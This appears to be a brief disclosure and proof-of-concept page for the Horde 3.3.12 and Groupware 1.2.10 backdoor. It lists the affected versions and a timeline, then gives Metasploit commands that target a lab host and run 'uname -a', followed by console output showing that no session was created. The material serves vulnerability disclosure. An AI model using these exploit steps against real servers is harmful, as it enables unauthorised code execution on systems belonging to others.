Timeline :
Public release of the vulnerability on 2012-02-13
Details of the vulnerability and first PoC disclosed by Eric Romang on 2012-02-15
Metasploit PoC provided by jduck on 2012-02-16
PoC provided by :
Eric Romang
jduck
Reference(s) :
Affected version(s) :
Horde 3.3.12 downloaded between November 15 and February 7
Horde Groupware 1.2.10 downloaded between November 9 and February 7
Horde Groupware Webmail Edition 1.2.10 downloaded between November 2 and February 7
Tested on Ubuntu 11.10 with :
Horde 3.3.12
Description :
This module exploits an arbitrary PHP code execution vulnerability introduced as a backdoor into Horde 3.3.12 and Horde Groupware 1.2.10.
Commands :
use exploit/multi/http/horde_href_backdoor
set VHOST devnull.zataz.loc
set RHOST 192.168.178.100
set PAYLOAD cmd/unix/generic
set CMD uname -a
exploit
msf exploit(horde) > set CMD uname -a
CMD => uname -a
msf exploit(horde) > exploit
[*] The server returned: 200 OK
[-] No response found
[*] Exploit completed, but no session was created.
msf exploit(horde) >
[-] No response found???